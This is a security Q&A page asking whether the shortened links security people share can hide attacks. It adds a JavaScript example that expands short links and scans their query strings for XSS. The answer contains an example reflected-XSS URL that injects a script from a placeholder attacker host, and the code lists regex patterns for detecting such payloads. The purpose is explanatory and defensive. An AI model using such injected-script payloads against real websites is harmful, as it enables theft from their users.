
I've been into IT-sec for a few years now and I have recently gotten into the whole reddit/r/netsec, twitter, security.stackexchange thing, to get more involved with the community. What surprises me a lot is that people are posting shortened links everywhere.

How can IT-sec people trust other IT-sec people? Are people content with just using the latest updates with NoScript and hoping there is no one linking to a page with an advanced exploit kit or persistent XSS vuln?

Memorem
    Are you asking how to minimise the risk from shortened links? If so, we have posts on that. If you are asking how we can minimise our risk from malware, we have many posts in that field. Can you clarify what you are asking? Have a look at other posts here to see if any help. – Rory Alsop Feb 09 '15 at 08:28

1 Answer


hope there is no one linking to a page with an advanced exploit kit or persistent XSS vuln.

The risk with shortened links isn't really persistent XSS, but reflected XSS and phishing.

Let's assume stackexchange is open to persistent XSS. If I post a link to https://security.stackexchange.com/questions/414141/my-evil-question you would believe that it is secure, visit it, and my JavaScript code would be run. Using URL shorteners doesn't add anything to my attack (it might even make you more suspicious).

If on the other hand stackexchange is open to reflected XSS, the URL would look like https://security.stackexchange.com/questions/414141/my-evil-question?someParam=<script src=evil.attacker/script.js></script>, and in that case shortening the URL would be helpful to hide the injected script.

How can IT-sec people trust other IT-sec people?

Well, you shouldn't trust random people at reddit/r/netsec, twitter, security.stackexchange.

And yes, latest updates are a good idea (most browsers have at least some filtering to defend against reflected XSS, and some phishing filters), and NoScript is also good.

If you want to know what is behind a shortened link, check out this question about verifying shortened links.

tim
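The point of the answer above is that a shortener hides the query string where a reflected-XSS payload would sit, so the thing to inspect is the expanded destination, not the short link. The following is an added example, not code from the question or from tim's answer: it expands a short link through a constructed redirect table (standing in for the shortener's 301 responses; `short.example` is an assumed host, `evil.attacker` is the answer's placeholder) and then flags script-like content in the final URL's query parameters.

```javascript
// Added example: expand a shortened link, then inspect the destination's
// query string for reflected-XSS-style payloads. Not from the original post.

// Patterns that should never appear in a legitimate query parameter value.
const SUSPICIOUS = [
  /<\s*script\b/i,            // injected <script> tag, as in the answer's example
  /<\s*iframe\b/i,            // injected frame
  /<\w+[^>]*\son\w+\s*=/i,    // HTML element carrying an inline event handler
  /^\s*javascript:/i,         // javascript: pseudo-scheme in a redirect/next param
];

// Inspect one URL: every query parameter is checked both as decoded by the URL
// parser and after one extra decode, so a double-encoded payload is still seen.
function inspectUrl(raw) {
  const url = new URL(raw);
  const findings = [];
  for (const [name, value] of url.searchParams) {
    const candidates = [value];
    try { candidates.push(decodeURIComponent(value)); } catch (e) { /* not decodable twice */ }
    for (const pattern of SUSPICIOUS) {
      if (candidates.some((v) => pattern.test(v))) {
        findings.push({ param: name, pattern: pattern.source });
        break;
      }
    }
  }
  return { host: url.hostname, path: url.pathname, findings, suspicious: findings.length > 0 };
}

// Constructed redirect table simulating a shortener's HTTP 301 responses. In
// practice you would fetch the short URL with redirects disabled and read Location.
const REDIRECTS = new Map([
  ["https://short.example/x1",
   "https://security.stackexchange.com/questions/414141/my-evil-question?someParam=<script src=evil.attacker/script.js></script>"],
  ["https://short.example/x2",
   "https://security.stackexchange.com/questions/414141/my-evil-question"],
]);

// Follow redirects hop by hop with a cap, returning every URL seen.
function expand(raw, redirects = REDIRECTS, maxHops = 5) {
  const hops = [raw];
  while (redirects.has(hops[hops.length - 1])) {
    if (hops.length > maxHops) throw new Error("too many redirects");
    hops.push(redirects.get(hops[hops.length - 1]));
  }
  return hops;
}

// Full check: the verdict is taken from the final destination, not the short link.
function checkLink(raw) {
  const hops = expand(raw);
  return { hops, ...inspectUrl(hops[hops.length - 1]) };
}
```

Note that `inspectUrl` on the short link itself reports nothing, which is exactly why the shortener helps the attacker; only `checkLink`, which expands first, catches the payload.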